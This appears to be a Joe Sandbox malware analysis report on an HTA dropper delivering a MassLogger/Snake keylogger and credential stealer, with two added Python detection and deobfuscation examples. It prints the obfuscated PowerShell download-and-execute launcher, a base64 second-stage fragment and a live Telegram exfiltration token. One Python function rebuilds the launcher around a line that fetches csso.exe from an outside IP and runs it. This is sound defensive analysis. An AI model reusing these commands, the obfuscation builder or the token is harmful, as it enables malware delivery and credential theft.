

Windows Analysis Report
uhg.hta

Overview

General Information

Sample name:uhg.hta
Analysis ID:1636641
MD5:179a3830db0768b766cc9375a3cf9a4c
SHA1:eb5290b3b563ad540db805c77b67bf49d394308e
SHA256:735354ae6e387cd7d7b63f2bc45f838f1218f956e278e20401b8ad606dec8488
Tags:htauser-abuse_ch

Detection

Cobalt Strike, MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7336 cmdline: mshta.exe "C:\Users\user\Desktop\uhg.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7400 cmdline: "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7452 cmdline: PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7584 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC24D.tmp" "c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • csso.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Roaming\csso.exe" MD5: 724A10F0D502447504BD44AD72AA462F)
          • RegSvcs.exe (PID: 7656 cmdline: "C:\Users\user\AppData\Roaming\csso.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
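The process tree above is the part of this report a defender can actually alert on, and three of the listed signatures read straight off it: the mshta.exe to cmd.exe hop ("Suspicious MSHTA Child Process"), csc.exe compiling a .cmdline file under AppData\Local\Temp on behalf of powershell.exe ("Dynamic .NET Compilation Via Csc.EXE"), and a RegSvcs.exe process (PID 7656) whose command line names csso.exe rather than RegSvcs.exe, which together with "Creates a process in suspended mode", "Writes to foreign memory regions" and "Maps a DLL or memory area into another process" is the shape of a hollowed host process. The following is an added example, not part of the Joe Sandbox report, that encodes those three checks over process-creation events. The events are constructed from the tree; the parent PID 1000 of mshta.exe, the benign cmd.exe event (PID 8000), the elided PowerShell arguments and the field names are assumptions.

```python
import ntpath
import re

# Constructed process-creation events modeled on the report's process tree (PIDs, images and
# command lines as shown there; long PowerShell arguments elided). The parent PID 1000 of
# mshta.exe and the benign cmd.exe event (PID 8000) are invented and are not in the report.
EVENTS = [
    {"pid": 7336, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\user\Desktop\uhg.hta"'},
    {"pid": 7400, "ppid": 7336, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C ..."'},
    {"pid": 7452, "ppid": 7400, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C ..."},
    {"pid": 7564, "ppid": 7452, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"'},
    {"pid": 7620, "ppid": 7452, "image": r"C:\Users\user\AppData\Roaming\csso.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\csso.exe"'},
    {"pid": 7656, "ppid": 7620, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\csso.exe"'},  # image and command line disagree
    {"pid": 8000, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c dir'},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SUSPICIOUS_MSHTA_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                             "cscript.exe", "rundll32.exe", "regsvr32.exe"}
TEMP_PATH = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def first_token(cmdline: str) -> str:
    """The executable as written on the command line (quoted or bare first token)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0] if s else ""


def analyze_events(events: list) -> list:
    """Return (pid, rule, ancestry chain) triples for every event that trips a check."""
    by_pid = {e["pid"]: e for e in events}

    def chain(pid: int) -> str:
        names = []
        while pid in by_pid:                       # stops at the first unknown ancestor
            names.append(basename(by_pid[pid]["image"]))
            pid = by_pid[pid]["ppid"]
        return " > ".join(reversed(names))

    findings = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        # 1. mshta.exe spawning a shell or script host
        if pimg == "mshta.exe" and img in SUSPICIOUS_MSHTA_CHILDREN:
            findings.append((e["pid"], "suspicious mshta child process", chain(e["pid"])))
        # 2. on-the-fly C# compilation from a Temp path, driven by a script host
        if img == "csc.exe" and pimg in SCRIPT_HOSTS and TEMP_PATH.search(e["cmdline"]):
            findings.append((e["pid"], "dynamic .net compilation from temp via script host", chain(e["pid"])))
        # 3. the image on disk is not the binary named on the command line (hollowing pattern)
        launched = basename(first_token(e["cmdline"]))
        if launched and launched != img:
            findings.append((e["pid"], f"image/command-line mismatch ({img} vs {launched}): possible process hollowing",
                             chain(e["pid"])))
    return findings


if __name__ == "__main__":
    for pid, rule, ancestry in analyze_events(EVENTS):
        print(f"{pid}: {rule}\n    {ancestry}")
```

The third check is the one most worth carrying into production telemetry: Sysmon event 1 and EDR process-start events both carry Image and CommandLine, and a benign process almost never starts with a command line naming a different executable.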
Source | Rule | Description | Author
00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security
00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0xefdf:$a1: get_encryptedPassword
  • 0xf307:$a2: get_encryptedUsername
  • 0xed7a:$a3: get_timePasswordChanged
  • 0xee9b:$a4: get_passwordField
  • 0xeff5:$a5: set_encryptedPassword
  • 0x10951:$a7: get_logins
  • 0x10602:$a8: GetOutlookPasswords
  • 0x103f4:$a9: StartKeylogger
  • 0x108a1:$a10: KeyLoggerEventArgs
  • 0x10451:$a11: KeyLoggerEventArgsEventHandler
(full report: 17 entries)
Source | Rule | Description | Author
7.2.RegSvcs.exe.380000.0.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
7.2.RegSvcs.exe.380000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
7.2.RegSvcs.exe.380000.0.unpack | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security
7.2.RegSvcs.exe.380000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
7.2.RegSvcs.exe.380000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0xf1df:$a1: get_encryptedPassword
  • 0xf507:$a2: get_encryptedUsername
  • 0xef7a:$a3: get_timePasswordChanged
  • 0xf09b:$a4: get_passwordField
  • 0xf1f5:$a5: set_encryptedPassword
  • 0x10b51:$a7: get_logins
  • 0x10802:$a8: GetOutlookPasswords
  • 0x105f4:$a9: StartKeylogger
  • 0x10aa1:$a10: KeyLoggerEventArgs
  • 0x10651:$a11: KeyLoggerEventArgsEventHandler
(full report: 13 entries)
Source | Rule | Description | Author
amsi32_7452.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security

                    System Summary

                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", ProcessId: 7564, ProcessName: csc.exe
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7452, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7452, TargetFilename: C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))", CommandLine: PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
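The launcher these Sigma hits fire on is obfuscated three ways at once: mixed-case spelling of every keyword (the "PowerShell case anomaly" signature), the `::` and `"` characters assembled from `[cHAr]58` / `[CHaR]0X22` pieces so that `FromBase64String` never appears as a contiguous string, and a base64 second stage; the fragment visible above decodes to `$j = adD-tYpe -mEmBERDefiNition '[DllImport("urLmon.dll", ...)]public static extern IntPtr URLDownloadToFile(...)' -NaME "HuwJrMudHL" -namesPAcE edv -PassThru;`, padded with long runs of spaces, which is the P/Invoke behind the `URLDownloadToFileW` call the report later attributes to powershell.exe. The following is an added example, not taken from the report, that rebuilds that launcher around a constructed stand-in second stage and then unwinds it the way a triage script would: fold the `'...'+[char]N+'...'` concatenation, pull and decode the base64 argument, and score both layers for the indicators. The stand-in's download call and `Start-Process` line are assumptions (the fragment on this page is cut off before that point), and the indicator labels are this example's own.

```python
import base64
import re

# Constructed stand-in for the base64 second stage. Its opening (Add-Type P/Invoke of
# urlmon.dll!URLDownloadToFile, the mangled casing, the "HuwJrMudHL"/"edv" names) mirrors
# what the report's visible fragment decodes to; the download call and Start-Process line
# are assumptions, since the fragment in the report is truncated before them.
INNER_SCRIPT = (
    "$j = adD-tYpe -mEmBERDefiNition '[DllImport(\"urLmon.dll\", CharSet = CharSet.Unicode)]"
    "public static extern IntPtr URLDownloadToFile(IntPtr G,string JwFF,string Dyp,uint X,IntPtr zJ);' "
    '-NaME "HuwJrMudHL" -namesPAcE edv -PassThru; '
    '$j::URLDownloadToFile(0, "http://23.95.235.28/50/csso.exe", "$env:APPDATA\\csso.exe", 0, 0); '
    'StArT-pRoCeSs "$env:APPDATA\\csso.exe"'
)


def build_launcher(inner: str) -> str:
    """Wrap a script exactly the way the report's launcher does (same option spelling, same [char] tricks)."""
    b64 = base64.b64encode(inner.encode("utf-8")).decode("ascii")
    return (
        "PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; "
        "Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'"
        "+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'" + b64 + "'+[cHar]34+'))')))"
    )


# either a single-quoted literal or a [char]N / [char]0xNN piece
TOKEN_RE = re.compile(r"'([^']*)'|\[char\](0x[0-9a-f]+|\d+)", re.IGNORECASE)
B64_RE = re.compile(r'frombase64string\("([A-Za-z0-9+/=]+)"\)', re.IGNORECASE)

INDICATORS = [  # (label, lowercase needle searched in the launcher and the decoded stage)
    ("execution-policy bypass", "-ex bypass"),
    ("no profile", "-nop"),
    ("hidden window", "-w 1"),
    ("invoke-expression", "iex"),
    ("base64 stage", "frombase64string"),
    ("char-code string assembly", "[char]"),
    ("p/invoke via add-type", "add-type"),
    ("urlmon download", "urldownloadtofile"),
]


def _char(code: str) -> str:
    return chr(int(code, 16) if code.lower().startswith("0x") else int(code))


def fold_concat(expr: str) -> str:
    """Evaluate a PowerShell string built from 'literal'+[char]N+'literal' pieces."""
    return "".join(_char(ch) if ch else lit for lit, ch in TOKEN_RE.findall(expr))


def mixed_case_tokens(text: str) -> list:
    """Words that are neither lower, UPPER nor Title case: the 'case anomaly' signal."""
    words = re.findall(r"[A-Za-z][A-Za-z.\-]{3,}", text)
    return sorted({w for w in words if not (w.islower() or w.isupper() or w.istitle())})


def analyze(cmdline: str) -> dict:
    """Unwind one launcher: folded stage 1, decoded stage 2, indicator hits, case anomalies."""
    stage1 = fold_concat(cmdline)
    m = B64_RE.search(stage1)
    if not m:
        raise ValueError("no FromBase64String payload found")
    b64 = m.group(1)
    stage2 = base64.b64decode(b64).decode("utf-8")
    visible = cmdline.replace(b64, "<b64>")  # keep base64 noise out of the scans
    haystack = re.sub(r"\s+", " ", (visible + "\n" + stage2).lower())
    return {
        "stage1": stage1.replace(b64, "<b64>"),
        "stage2": stage2,
        "indicators": [label for label, needle in INDICATORS if needle in haystack],
        "mixed_case": mixed_case_tokens(visible),
    }


if __name__ == "__main__":
    result = analyze(build_launcher(INNER_SCRIPT))
    print(result["stage1"])
    print(result["stage2"])
    print(result["indicators"], result["mixed_case"])
```

Folding the concatenation before searching is the point: a rule that looks for the literal `FromBase64String` in the raw command line misses this sample, because the string only exists after `[char]` evaluation; PowerShell Script Block Logging (event 4104) and AMSI see the folded form, which is why the AMSI capture `amsi32_7452.amsi.csv` above carries the decode-and-execute Yara hit.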

                    Data Obfuscation

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", ProcessId: 7564, ProcessName: csc.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-13T01:18:55.126197+0100 | 2022050 | 1 | A Network Trojan was detected | 23.95.235.28 | 80 | 192.168.2.6 | 49694 | TCP
2025-03-13T01:18:55.217462+0100 | 2022051 | 1 | A Network Trojan was detected | 23.95.235.28 | 80 | 192.168.2.6 | 49694 | TCP
2025-03-13T01:19:03.185771+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49695 | 158.101.44.242 | 80 | TCP


                    AV Detection

                    Source: C:\Users\user\AppData\Roaming\csso.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.nvufs
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exeAvira: detection malicious, Label: TR/AD.SnakeStealer.nvufs
                    Source: 00000007.00000002.2527369873.0000000002611000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exeReversingLabs: Detection: 70%
                    Source: C:\Users\user\AppData\Roaming\csso.exeReversingLabs: Detection: 70%
                    Source: uhg.htaVirustotal: Detection: 33%Perma Link
                    Source: uhg.htaReversingLabs: Detection: 23%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 99.9% probability

                    Location Tracking

                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49696 version: TLS 1.0
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.pdb source: powershell.exe, 00000003.00000002.1399001221.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: csso.exe, 00000006.00000003.1393345540.0000000003610000.00000004.00001000.00020000.00000000.sdmp, csso.exe, 00000006.00000003.1378138360.0000000003470000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: csso.exe, 00000006.00000003.1393345540.0000000003610000.00000004.00001000.00020000.00000000.sdmp, csso.exe, 00000006.00000003.1378138360.0000000003470000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_0008445A
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008C6D1 FindFirstFileW,FindClose,6_2_0008C6D1
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0008C75C
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0008EF95
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0008F0F2
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0008F3F3
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_000837EF
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00083B12
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0008BCBC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02455782h7_2_02455358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 024551B9h7_2_02454F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02455782h7_2_024556AF

                    Networking

                    Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 23.95.235.28:80 -> 192.168.2.6:49694
                    Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 23.95.235.28:80 -> 192.168.2.6:49694
